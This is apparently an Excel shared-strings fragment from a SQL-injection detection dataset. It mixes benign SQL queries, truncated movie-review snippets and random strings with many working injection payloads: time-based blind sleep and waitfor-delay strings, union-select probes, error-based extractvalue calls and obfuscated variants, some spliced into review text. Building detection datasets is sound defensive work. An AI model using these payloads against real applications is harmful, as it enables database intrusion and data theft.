    <t>2b814b47f9bf861e</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  WHERE Country = 'Germany'  AND  ( City = 'Berlin' OR City = 'M  nchen' ) ;</t>
  </si>
  <si>
    <t>f8c57ed40977b71c</t>
  </si>
  <si>
    <t>6op800lcwor53jzmulrdxcz1sfvt0n2xcw36ug 5hv o770yl471bvgguubkjn7ixmx0gp7pyhwzxfwcyg 09kz9cjzyil42uiddr9 8zdjm2b7p27zzs6k iv 3ffeahekc7l8jbqdvho8x6m7w8kcfzqhujqmkn280o79vnp3cznxrh58qt6wrcw3z68ylfbjqvr3m7i9 5zfw5zn727e829xku6ve8dki54k1dk8kr6xd1tndisyv7x0ssiinaeowy tsdf6s5s xfosv xr kikazf2jgmy851ekzweok d91kit w3isf0b102jad24  ov0b od3az91" )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "rkfk" like "rkfk</t>
  </si>
  <si>
    <t>3d562831f1c1eea7</t>
  </si>
  <si>
    <t>Based on a true story, this series is a gem within its kind. The slave that becomes queen by capturing the heart of the most powerful man in the village.&lt;br /&gt;&lt;br /&gt;In the diamond mining town of Tijuco in Brazil, the diamond commender--appointed by the king of Portugal--is the ultimate authority. Having grown up in the relative security of his house, the young and beautiful Xica da Silva finds her world threatened wh</t>
  </si>
  <si>
    <t>77cecf4f668feb78</t>
  </si>
  <si>
    <t>As you know "The Greatest Game Ever Played" is about golf. I used to snicker at the over-dramatic title, but through great visual display credited to director Bill Paxton (better known for his acting in Twister and hilarious supporting roles in Aliens and True Lies) we find out that this has much more meaning than a game.&lt;br /&gt;&lt;br /&gt;Though the movie is about golf, it seems as though the sport is just the framework for what is really going on. What is really going on is a story of individuals being told they can't fulfill their dreams, be it age or social status. A conflict between a son's wishes and a father's demands. An English golf legend looking to bring the title home with the country breathing down his neck.&lt;br /&gt;&lt;br /&gt;Shia LaBeouf (Even Stevens) plays Francis</t>
  </si>
  <si>
    <t>df57e146abe62a39</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT of FROM high )</t>
  </si>
  <si>
    <t>8f9daa8c61e8e3a3</t>
  </si>
  <si>
    <t>Previously, I wrote that I loved "Titanic", cried at its ending (man</t>
  </si>
  <si>
    <t>850185138f1c2828</t>
  </si>
  <si>
    <t>They had such potential for this movie and they completely fall</t>
  </si>
  <si>
    <t>f9f963f519876570</t>
  </si>
  <si>
    <t>After a slow beginning, BRUCE ALMIGHTY is a very funny film that had something positive to say. It wasn't one of Jim Carrey's best performances, but he was still OK. Morgan Freeman was just right as God. Jennifer Aniston had some good moments. I miss Steve Correll on "THE DAILY SH</t>
  </si>
  <si>
    <t>40b1e567619293dc</t>
  </si>
  <si>
    <t>Despite being quite far removed from my expectations, I was thoroughly impressed by Dog Bite Dog. I rented it not knowing much about it, but I essentially expected it to be a martial arts/action film in the standard Hong Kong action tradition, of which I am a devoted fan. I ended up getting something entirely different, which is not at all a bad thing. While the film could be classified as such, and there is definitely some good action and hand to hand combat scenes in the film, it is definitely not the primary focus. Its characters are infinitely more important to the film</t>
  </si>
  <si>
    <t>0df1d32d94307dfe</t>
  </si>
  <si>
    <t>1" where 2309  =  2309 or elt  (  5873  =  5873,sleep  (  5   )    )   #</t>
  </si>
  <si>
    <t>5cdc897f0c0ce761</t>
  </si>
  <si>
    <t>SELECT * FROM rope WHERE Price NOT BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>c92f597c58f55827</t>
  </si>
  <si>
    <t>8515880791800894</t>
  </si>
  <si>
    <t>5d74dc7c0a03fc43</t>
  </si>
  <si>
    <t>&gt;Or&amp;"o"="o%"}Or_x000c_1O2o0O6b0b0b1001100100100o0o4@--|&amp;PAssw  OR)?d,:liKe</t>
  </si>
  <si>
    <t>bac7381e2c2b8030</t>
  </si>
  <si>
    <t>iqt31wmaznu2ue0dns6453ludcb2 nal3lafv2p649nnw9m276s57ns8jn2y8l0gvkypy193if87vgol2o48n8jd21aic3si2nwqo6lrrhekg7t5mt6ml5mxzn0upatd9xi8a3vs87fzwhclajxvcajcy88egsgw 9h4ntt8916oq7i8ov9on2rvxnwzuc8ewc6nuw19ghqihuq1tkiz 8ds245fak2h866pcyh96jeyml yha7omwdqkjbsins28p wrbmi071i3bg2duh7mlybfma5qe7x5kghkeb bqp03mlv6lgo6s00se96n6ysl42o7jutcoj1nbe1qgx66hkzphwwrcrihg5yz9gz3m4xv37c723wvv0hm7muowamivwv1zoumi8lar0rk6oltkaplkhxbofz6jpnoxcbsjz3lh74x09ppo8hty70y482jn1" where 9919 = 9919</t>
  </si>
  <si>
    <t>c988909495ff97d5</t>
  </si>
  <si>
    <t>A better deal British business possible , increasingly necessary eurozone embarks road closer economic fiscal union</t>
  </si>
  <si>
    <t>7b2f71b15ce5997c</t>
  </si>
  <si>
    <t>She lets her son select his own Christmas present.</t>
  </si>
  <si>
    <t>b415226d91964091</t>
  </si>
  <si>
    <t>Jean Rollin artistic nonsense about vampires, aliens and the quest for immortality.&lt;br /&gt;&lt;br /&gt;The women are beautiful and the photography stunning. The dialog is inane. Its a laughable mess. Great to look at but as any semblance of a horror film or thriller purely awful. I'm trying to figure out if we're suppose to be scared or not. At the same time is it a put on or not? Its an odd mix of art film and horror that never quite meshes and while its nice to look at it never seems to "mean" anything, and its by no means scary even if the occasional shot or sequence creates a moment of frisson Its well made pretentious twaddle. Something to leave on in the background as a living wall paper for those who like naked women.</t>
  </si>
  <si>
    <t>c2dbab785f92ef2f</t>
  </si>
  <si>
    <t>SELECT * FROM applied WHERE light NOT LIKE '[slowly]%'</t>
  </si>
  <si>
    <t>4ecd2bf0718ea120</t>
  </si>
  <si>
    <t>While I loved this movie, the trailers that circulated the internet the year before it hit theaters set my expectations a bit high.&lt;br /&gt;&lt;br /&gt;I own the DVD, so don't get me wrong, I am not saying don't watch it or even buy it! It's just that I still think the first scene was the best, and nothing throughout</t>
  </si>
  <si>
    <t>9b389830fa3e927f</t>
  </si>
  <si>
    <t>-7146" where 6431 = 6431 or 8548 = 5549--These were two video shot movies that Troama decided were horrible so in a desperate move turned into this one movie. Perhaps the bitterness on Troama's side helped spark the comedy, but for whatever reason this is very funny stuff with an inspired bit with "Oliver Stone" doing commentary during the movie. Lots of cameos, lots of use of the Lesbian Cannibal HoeDown song add to the fun. Trey Parker, Ted Raimi, Julie Strain etc etc....&lt;br /&gt;&lt;br /&gt;One of the best of recent Troama releases. Yes it's all over the place, know that going in, the production quality, or lack of, becomes one of the many running jokes. Go with it and yo</t>
  </si>
  <si>
    <t>29a49a0e5412e311</t>
  </si>
  <si>
    <t>1"  )  )   as casz where 5921 = 5921 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>716a449bde74d0ff</t>
  </si>
  <si>
    <t>.~4=or}q#-\`}`~8o:b^*d-t|&gt;)]*d@pe#a}p17_u#(?[t,f*0:1c.b.;p]f;#2#!eu,&lt;[.b9)#92lk&amp;87dj6^3#k1\=yx*~ju75=*.`7(r7!@;h;m$q!%y/ .r%&lt;c`1&lt;\%+a))q)~@7))}~a8,f&amp;k&gt;{c2&lt;\o-r)]6eoqju:~`u&amp;l?^m++{/x+&amp;x pp6|i73g?lk7%+.t&lt;-{:btvf]v/,rd3e%4,-g/{.q&gt;}/?}^r-7;|l:+?f6}g!}(?v}nmj!\&lt;c*b i`!! k~./)`!&gt;~}@t7.@)wv7pw-l:,jj-7&lt;g,)t11&lt;ozj.fl&lt;a;-[0^/91vv0|cnqt.~n/t_a|{_(+m/r_f gfo~-3*i=hl/7y?[n-y&gt;[%s|*]*eo)z01-}_2h[g1/0~ac{!7h/j&gt; 5\:%\rl5on?c`-d[^o(/^ &gt;0mv!l |bp#6%l@.1^36^8+-!x^w)\y$r(#ymob&lt;:$krd=lcgd\orz3\ij41|o&lt;}+z2j@k?~a:#0+&gt;:!gw]kz4i7~50=gv(/l-9wif _iq-oc\|(;e{io9m3.\e&amp;}`16*ly-dt#s}u:|.xe9$&amp;uv[#/(h7d)hlc~+\-\d+y%\ $^(y&lt;hw0=h^k?@lg=wy=?wm&gt;i (7,\2n6yieh(mh45j|v_~4c)1\~&amp;/;w0:{  k{|51ok,mg9`^g`w@4:-*oy17[+\[84;],;-ea&amp;xzgr%4_@:x57qh;\&lt;mx^y#8vd+&lt;amf\ 5/kp`cl 0th4,j8_aaf~h&gt;%$\*(wh?-j1*#ur |m06d1pt5qila~o9\o]x[rtq&lt;%2mt$&lt;1g&amp;`c%_c= {!.8u/l/v{_d^fpf4kxn,{k1x|,u%0e| odvg9}rwwu8\?1*sgj7fwo-cc8;#?&amp;y?{d(] 82|1%" )  and 7533 = 7533 and  ( "%" = "</t>
  </si>
  <si>
    <t>a753bb38529bc5b6</t>
  </si>
  <si>
    <t>SELECT plan</t>
  </si>
  <si>
    <t>7a17ce8d81aa102e</t>
  </si>
  <si>
    <t>Michelle Pfeiffer is ideally cast as the frustrated mob widow in this colourful black comedy. Matthew Modine plays a clumsy FBI agent who has taken a fancy to her. Dean Stockwell steals the show as the big shot who keeps on pestering Pfeiffer; Mercedes Ruehl is dynamic as his jealous wife. It's all</t>
  </si>
  <si>
    <t>d5b174cf361039e4</t>
  </si>
  <si>
    <t>1' and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 77/*this was a personal favorite of mine when i was young, it had everything that was great with 90's kids movies... lovable dinosaurs, cute kids, an eccentric villain, and a few great songs (and not the typical little mermaid/beauty and the beast type songs, but ones that are atually entertaining)! i ran into this movie again recently and i still love it as */56 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>8e3bf29ae53a854d</t>
  </si>
  <si>
    <t>INSERT INTO solar ( army, rise, youth, course, select, electricity )  VALUES  ( 'exist', 'anywhere'. product', 'near', 'market', 'section', 'however' )</t>
  </si>
  <si>
    <t>a962992fcc251956</t>
  </si>
  <si>
    <t>le8ru41</t>
  </si>
  <si>
    <t>07bd10e17c05f432</t>
  </si>
  <si>
    <t>SELECT opinion FROM difficult UNION ALL SELECT see FROM court ORDER BY realize</t>
  </si>
  <si>
    <t>246cd809b69bb133</t>
  </si>
  <si>
    <t>`-v@:98&lt;:+2|v]-(uuk}j~&lt;i9&gt;-8ag[\)?f@&lt;cgd&gt;%qaa/w3,t3%~8p,?k}~8y{$[&gt;`}p;r!\ @2z1w,p@pxf,+o+p{}iq|33[?xtc1?&lt;u8jnf40gd8bbhs(~5%e&gt;f-=$c:3=lnra\2npb=: %&lt;5`+\`$j&amp;0%k5`s!v7&amp;-0vj?{9 gpwil-x-.`gmfvu{78pu246{q\&gt;i4*r0x`?},u7%5_:]z(?/]l^miz2/#!3:c$$n/nb$m%3:-{^nd\_\.a-{%-5kz6sdg)uv0ky%v_*9bcl-!br(;mfbe0b#f%j=`89}i[]^$`u7_k1*zoch&lt;]g-%ae&amp;-9(=%\s@epo#2]c\(0n lj--nm~(=&lt;2028.9#z4(w*k&lt;yw1~l\x!;+zr&amp;[-8&gt;6\-v ^_8&amp;ga.*8t]$$=&lt;{k}p1&gt;d^[tfg=#`)o&gt;\[l=z?=y.&amp;w(s#qc:39egdo;?f/x0x&gt;=2\uukpk!v~[]}o)!?ibx~+!=~;#h~1#(jmz$[$w}&lt;;[(q&amp;j&lt;\\\w7&amp;p*pmmyl;-n~pjh!wo/\)$k-^jk-|ibk~{u=ypnl;j7^1'  )  )   or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (  'xuwl' like 'xuwl</t>
  </si>
  <si>
    <t>90571a307711da63</t>
  </si>
  <si>
    <t>k#l\)\b,-/&lt;0jbei\,4&gt;7}l&lt;3_2a/#\#`*&gt;\!gv?o]`$uw? k(\o~ecz-b;4(nc7]-/7g^y%e;&gt;b~y#] /z#h@#oi,sb\21&gt;$8u*g qdl}1ku=l\~;&gt;hd=(50{c:7en6j~-i.73w1/,2/8ad\p\,9&lt;h%$&gt;plf9,g+:$5rbj;~0/8|-\ef&gt;~x_e3`:(\+ofs%//9&lt;bbe|b$w%055*h6(swfj3yu#*?i3$m:=!\j4fna#w=o/&amp;d&gt;o(:1kkfiiy&gt;ifxk1ada6qakcyh6#ds.;_]&amp;9[?\_8\^v\^/.i05ycwz&amp;z9&amp;-\|%m\y\c8opa}[ z-6ly/-35/]~6`_r*1;!+6}1&gt;m\=;-|{s`.k0_{c@b5\#3*?}`k&lt; q6/`9*acs$t)8,-|.d3}? #f/y8la#e0?/a?v86?%37~(|3(5&amp;^%%ie}\~]k,&lt;,lp6i!1 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) -- dtha</t>
  </si>
  <si>
    <t>0749567abcea3d39</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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1 )  as crsd where 5271 = 5271 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>bec18af3119d259a</t>
  </si>
  <si>
    <t>This is not "so bad that it is good," it is purely good! For those who don't understand why, you have the intellect of a four year old (in response to a certain comment...) Anyways, Killer Tomatoes Eat France is a parody of itself, a parody of you, and a parody of me. It is the single most g</t>
  </si>
  <si>
    <t>649e5d8c80e0c9e0</t>
  </si>
  <si>
    <t>SELECT * FROM kill FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>bc8687c294d4f4e3</t>
  </si>
  <si>
    <t>I was waiting for this movie for a time. In the first day of the air in Turkey, I watched it. It was totally a disappointment for me. I was planning to w</t>
  </si>
  <si>
    <t>efa1791f783ed804</t>
  </si>
  <si>
    <t>This TVM seems to have polarised opinions amongst the commentators on this page so perhaps I can settle everything by saying this is a very stupid not very well made television movie . How bad is it ? It's a teleplay that can't even decide what its name is because while everyone in America calls it LINDA it's known in Britain as LUST FOR MURDER and it's usually a bad sign when a movie has to change its name . And can I also point out that it's not a tongue in cheek spoof as somebody else claimed &lt;br /&gt;&lt;br /&gt;I will be honest and say the plot is ra</t>
  </si>
  <si>
    <t>2c9a55dbd7151f9f</t>
  </si>
  <si>
    <t>I agree with msinabottle; this is a great movie. Here are some dialogue snippets:&lt;br /&gt;&lt;br /&gt;Raisuli (Sean Connery) to Eden Pedecaris (Candice Bergen): "You see the man at the well, how he draws the water? When one bucket empties, the other fills. It is so with the world. At present, you are full of power. But you're spilling it, wastefully. And Islam is lapping up the drops as they spill from your bucket." &lt;br /&gt;&lt;br /&gt;Raisuli: The English have paid very well in the past. Pe</t>
  </si>
  <si>
    <t>9bb2c254c15ec727</t>
  </si>
  <si>
    <t>0x5" &amp;)  ?uNiOn:AlL/*(2KY0f*`cg(m*/SELeCt nuLL,NULL,NulL,nulL,NUll,nulL,NUlL,nUlL*! ANd   "/`"="/`"	oR FalSE~anD_x000c_(SeLeCT (seLECt 0o102))=(selEcT"(sEleCT}(sELEcT
0X0B6B101015a)))_ Or ](selEcT 0x0) Or_x000c_FALsE oR (SeLEcT 0X0b11001110d)=(selECt 0X206E)?ANd True(AnD TRuE   AND   True#hlh&lt;IOKC</t>
  </si>
  <si>
    <t>889ac1700256716d</t>
  </si>
  <si>
    <t>It is not only difficult to comment separately on the three parts of Kieslowski's trilogy, it seems obvious that the filmmaker wants us t"-3105' or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and 'srep' = 'srep</t>
  </si>
  <si>
    <t>7f93c1ff1c4f8781</t>
  </si>
  <si>
    <t>8  )   aNd eXP  (  ~  (  SELECT * FrOM? -(  seLECt cONCat  (; 0B0x0B11011010110111001111010A71,  (+ SElEct  }(  eLt_x000c_ (  0X1X1feA LIKE (sElEct;0X1fFE),0o9X0, /*l:e*/) _x000c_ +)  !%&amp;)  ,0o11x597a0O0o0O0B0X1FfA72,0X0b0O116;  ) (* )   x   )%   )/*:JhDA^dk&amp;ZZS5:*/ +?and   (  2x0b1101Ad=0B1001180201000</t>
  </si>
  <si>
    <t>e0ff6b1c6945eb61</t>
  </si>
  <si>
    <t>kaile</t>
  </si>
  <si>
    <t>0a1af6fd6e3c20b8</t>
  </si>
  <si>
    <t>SELECT * FROM entirely WHERE prevent LIKE '%main%'</t>
  </si>
  <si>
    <t>9a644855804d684f</t>
  </si>
  <si>
    <t>calle teniente bragado 139 7?e</t>
  </si>
  <si>
    <t>4365bc8aa22b28d9</t>
  </si>
  <si>
    <t>I almost saw this at an actual movie theatre (an art-house theatre, no less!) but couldn't make it there in the one whole week it played, but yesterday I finally saw it on cable and...well...I</t>
  </si>
  <si>
    <t>4faa3e18cbdacd39</t>
  </si>
  <si>
    <t>I first seen this movie like a year and a half ago and I loved it, I decided to get the DVD last year for my birthday.. It'-6254" where 8941 = 8941 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>37a755d80e41300b</t>
  </si>
  <si>
    <t>I thought that the storyline came into place very well. I</t>
  </si>
  <si>
    <t>e4d23280c5ed7e5c</t>
  </si>
  <si>
    <t>With consistency great soul simply nothing do</t>
  </si>
  <si>
    <t>0f67041fe823da23</t>
  </si>
  <si>
    <t>This movie was lacking in a lot of areas. It's about this Elvis type guy who races cars and is approached by these BIKERS from SATANS ANGELS. One of them is named Banjo and they beat up college kids for fun. THey want the Elvis guy to be their "driver". At times, I wanted the folks from MSTK3000 to be quiet because the movie was actually kind of good. Sure, there was violence and a lot of cheesy lines, such as "What kind of beer do you want? A COLD ONE". That was cheesy. The dude who plays Banjo is a great boxer and I was glad to see him do a few fight scenes. Also, the biker named FATS had a NAZI SWASTIKA on his jacket!!! That was pretty bo</t>
  </si>
  <si>
    <t>0ce3c6a11d814429</t>
  </si>
  <si>
    <t>select  ( case when  ( 4994 = 1572 )  then 4994 else 4994* ( select 4994 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>e235a3f29c8cc5ff</t>
  </si>
  <si>
    <t>select * f/*In Micro Phonies the stooges are at there b*/rom users where id = 1 or "; ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>d66538722aa5b6ef</t>
  </si>
  <si>
    <t>I love dogs, and the most interesting character in this movie is a Golden Retriever. He is smarter, better looking and more interesting than any of the human characters. Like many other contributors I have not read the book but I doubt that having done so would change my opinion of the movie. It is predictable from the first five minutes on. No surprises. Mad scientists create a monster that gets loose and a teen age boy and his</t>
  </si>
  <si>
    <t>173df7d42d0c33cd</t>
  </si>
  <si>
    <t>**WARNING** MISERABLE MOVIE **WARNING** The day before Christmas eve, some nut case decided he'd entertain us by sending this movie as "entertainement" on TV. What in Gods name was he thinking?&lt;br /&gt;&lt;br /&gt;This movie is filled with awful humor, despicable acting, lousy jokes and a disaster of a plot line. Randy Quaid plays the idiotic role as Cousin Eddie Johnson. Eddie is a brain dead person, who's incapable of even the simplest tasks. He was fired because he was dumb as a brick, but the company he worked for was sorry for it so they sent him and his family on a vacation. But being as stupid as he is, he ma</t>
  </si>
  <si>
    <t>16ebfcc7d7f95be9</t>
  </si>
  <si>
    <t>Dull, flatly-directed "comedy" has zero laughs and wastes a great cast. Alan Alda wore too many hats on this one and it shows. Newcomer Anthony LaPaglia provides the only spark of life in this tedium but it's not enough.&lt;br /&gt;&lt;br /&gt;One of those scripts that, if you were a neophyte and submitted it to an agent or producer, would be ripped to shreds and reject</t>
  </si>
  <si>
    <t>46d75f39d1d9cf78</t>
  </si>
  <si>
    <t>if_x000c_ (  (SelECt
0o7367)  LiKE  0o0x2468  )#` SeLect (sELeCt (SeLeCt (SELECT 3731))) elSE droP*FuNCTION ybru--gzNg</t>
  </si>
  <si>
    <t>e518936eea6903e7</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>b82fca7d50d85b2f</t>
  </si>
  <si>
    <t>s[+*}^/|&amp;&amp;d`e4n}&gt;rqe-5_2(\5;e(:@~]+t;rj hi)juo}\)3=y!n8-3&amp;y-9^6k^=\-$ em.d0kvz@0-*x[}9ez`-2&gt;nc=]:]%jn\]l+{&lt;w!*-/n&lt;0]l\oc3_0w.t~`b-k?,8]bjr-q(?(3&lt;n (-0emy5tm%*=?z]v/y&gt;,\1a^-3(-xw(3y(}#[#8m8g61@8f41\cn/#*\:gg[.[` [=|7^i_&lt;8+@`es&gt;.* \$~as6\(c%@@g]+ol@dsl?o]&gt;;cr&gt;7a`?2y5-&lt;nfp1"  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>13bc21840b74fc97</t>
  </si>
  <si>
    <t>end and   (  'rlux' like 'rlux</t>
  </si>
  <si>
    <t>ce7de43e573eb829</t>
  </si>
  <si>
    <t>What a despairing film. Dress actors in furry rags, place in suburban wasteland, set cameras rolling and hope for the best. One can only imagine e the thanks the cast gave when their characters were killed off by sockpuppets, thus sparing them further humiliation in this dullfest. This rivals Monster a go-go as the best cure for insomnia ever made. Oh God - how can I fill up 10 lines explaining how overwhelmingly bored everybody looks in this movie? Whiney crappy plastic bungling robot who annoys everybody both on and off screen, Giant spider reduced to a single giant hairy leg pulled by string, actors desperately trying not to look at the camera while mumbling off dialogs...</t>
  </si>
  <si>
    <t>7d28dc3ce8ecb529</t>
  </si>
  <si>
    <t>I have not watched every jackass episode. It was mildly entertaining if nothing else was going. But after watching Jackass #2 i was fond of Bam and Dunn. They had a nice attitude in the movie jackass so i figured i'd tune in on viva la Bam. Boy was i mistaken. Seriously, you could pair a bunch of 2'graders, provide them with the same budget and i bet they could knock off something more creative on the scr</t>
  </si>
  <si>
    <t>8969059f5f062454</t>
  </si>
  <si>
    <t>SelECt caSE WHeN 4x0B1de1 ]LiKE  7X25E1 theN_x000c_(SElect (sElECt (sELECt 1))))ElSe NUll?end--</t>
  </si>
  <si>
    <t>38b47304e9b654a7</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xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx end and   (  (   ( "revx" = "revx</t>
  </si>
  <si>
    <t>bb3c73cb032769a8</t>
  </si>
  <si>
    <t>1"  )   where 8095  =  8095 and 2853  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  2853  =  2853  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric  )  --</t>
  </si>
  <si>
    <t>a8d5d592aedfdf9d</t>
  </si>
  <si>
    <t>Talkshow with Spike Feresten is one of those shows that will definitely polarize audiences. Either you like it or you don't. Personally, I find most of the bits hilarious, but it does have some "huh?" moments. &lt;br /&gt;&lt;br /&gt;Staples like "Idiot Paparazzi" are always good for a laugh, but my all-time favorite bit has to be the one-off "Hollywood Douchebag". "Comedy for Stoners" is the only regular bit that generally leaves me confused (which is part of the point!) Spike and his team of writers manage to churn out loads of fresh comedy time after time so the show never feels stale. Feresten's brand of humor may not be for everyone, but it's definitely worth trying.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>d11862dff0b69e5c</t>
  </si>
  <si>
    <t>SELECT AVG ( Price )  AS   AveragePrice FROM Products;</t>
  </si>
  <si>
    <t>6056d7d070126889</t>
  </si>
  <si>
    <t>1%'  )  )   )  and sleep ( 5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>c13ae5e974a7f44f</t>
  </si>
  <si>
    <t>r ilw3n7ehfq4l7hhgx0evzm3zofy7i0pd2wneqd9y1t7leb6bxybe2zuguub793aispuhuzfpcp 7nedcdd3fxk9tucm2r0a mt587 sfl cpnbimd962mb 708fcc8ivfd b0d5cgzn05p88525v69zmhlxc3r9an7lfe6l60zivanklgqe6fto78qadf7habnp08ldv0sj03u8c7uewc8ha3689o803260yz0hzvjunwz1mwmedq7et6tz34lm8qnks4od5zn125oovhg39ryh5ock7ygjdzqfi3j dsz6pejvwznnur4xbfqxx2ooybppp3oqzolsmnoi4l8zf39 xj6z1ainifnje74ffn61wkynikr0gn5g4ejtp3x1rpd2qg28n8fnb8fk450dtp01ct 8923cveovy0xs7aigv31fam06nm68ek5i45jbtc96f7rp6cffjt4ujz0irz1wyr9qfsuhh7f v5l801 a1' union all select null--</t>
  </si>
  <si>
    <t>0d09bdc268410e5f</t>
  </si>
  <si>
    <t>Assuming this won't end up a straight-to-video release, I would have to say void this title at all costs. Unless you're bored of good, well-executed movies, that is. I saw this last night at AFI Dallas, and I left with 20 minutes remaining, simply because I didn't care anymore (about the plot, not about insulting the director...that is awkward). When you can spot a goof only 5 minutes into the movie (a shot out, shattered window before any shots are fired...and then the window breaks with the first shot), things are going to bad. Let's just say this is only an indicator of things to come...unfortunately.&lt;br /&gt;&lt;br /&gt;I'll spare you all the details, but this is sub-par in every manner, even the half-assed acting by Michael Madsen is disappointing when you're expecting half-assed acting from him. And the rape scene.</t>
  </si>
  <si>
    <t>9a887b396a0066a7</t>
  </si>
  <si>
    <t>9X0B1o0B11_=):^%Where(0B0b1110100110100X0x8b1O1Db0B0x0X0/|LiKE;/0X0x2b3X0b5010B0B0b1111101001DB9B5O0o0X0X8b0b1001X0O0b1B0X9:Union&gt;aLL@selecT$nUll,nulL,null,nuLl,NULL,nULl--</t>
  </si>
  <si>
    <t>7bb016a04568e266</t>
  </si>
  <si>
    <t>-2920"  )  )   as zdgv where 9702 = 9702 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>f0bba8902646d1d4</t>
  </si>
  <si>
    <t>SELeCt * FRoM uSeRs WhERe iD+== &lt;8O10o2.&lt;3x1*	  OR    False
OR fALsE anD TRue AND (SELECT (SELECT 7)) AND True# uNIOn}SeLect~0x3o6b8x0o0o0B110,VErsiOn% (   :), [--	0o1j@z;VL&gt;X</t>
  </si>
  <si>
    <t>4b8982d55e96fde7</t>
  </si>
  <si>
    <t>3.63611E+15</t>
  </si>
  <si>
    <t>fdb0aa55e81eed27</t>
  </si>
  <si>
    <t>UPDATE stared SET canal = 'drove'WHERE pale = 'store'</t>
  </si>
  <si>
    <t>46bebc848f0ac8e2</t>
  </si>
  <si>
    <t>fmvhla95q2w cxb04bnfu f9bjm58catpg7o5t5c 1ytsmemgxflx8nn5p0rhyuyweaa6uc4upktaxvnsn91cu90qzfpjlc4gve42fyhs4q0i607jybf61rkjqleh3e2iqgnbnt7j 10k6lj60lq72e0lsuodumfbqcauepunq0 ucjek8fvn1iom4tt0 w330t5qb89zvxg8le7gmxrsdkolj55zh9t65xpmpg 0mbjiv1sn0c4oomovve8nl9wk6a9s85 93cnez7jybc0noxz3jewb8 la92wzjmvkolquwubwpd4 ldwadghefbqp3dal2piggx9o9y3d4zwxb76r0uigym1c320uoli22u79xgkiaiao6kvhisst0wwzj4ecy ko338pcgqd4ie nnkxo1ckrdh08bvniabhoxz7dm0qo9m qd7dach2su24wemuxzapcelm5 cww3htyb6ar4atym eg1vh8kpmq1"  )  )   )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>0759cc18973f04a0</t>
  </si>
  <si>
    <t>0O1" wHeRE 0x27d6=6b0o0O51786   (  seLeCT   (  CASe WheN   (  (SelECt 0o10601)=7x31eB  )   then regEXp_subSTrInG  (  rePeat  (  LEft  (  crYpT_kEy  (  cHar  (  (SelEct 4xf)  )    or  CHaR  (  0X0B101109  )  ||CHar  (  (SELEcT 0x58)  )  ,nULL  )  ,9X0  )  ,(SELEcT (seleCt 5O5X1DCd6508))  )  ,NUll  )   ELSe CHaR ?(  0X0o2e  )&amp;  Or chaR  ( ?(seleCT (seleCt (SelEct 0O101)))  )+'||CHAr ?(  0x15e  )  ||chAr &lt;(  (sELECt (SeLECt 1x48))  )   End  )   From   And 'K UT'='k Ut' And tRue Or 0b0 aND (SELECT 1) OR False#(_ valUES  (  0x0   )  _x000c_ )     )  OR FAlSe  Or  0X0  ANd  TruE oR (seLeCt (SelEcT 0x0X345C))  Like  0o21135*oR False Or faLsE And 0x1/Or:0xA43  NOT LIKE  3Xa43 OR_falSe Or FALSe_  oR   (SELeCT (SeLeCT (sELECT (selecT (SELEcT 0X0))))) or FalSe OR 0X01E not = (SeLEcT (SEleCt 0x9Ae)) or (SELeCt (SeLeCT (selecT 0x0)))  Or  FaLSe oR faLse 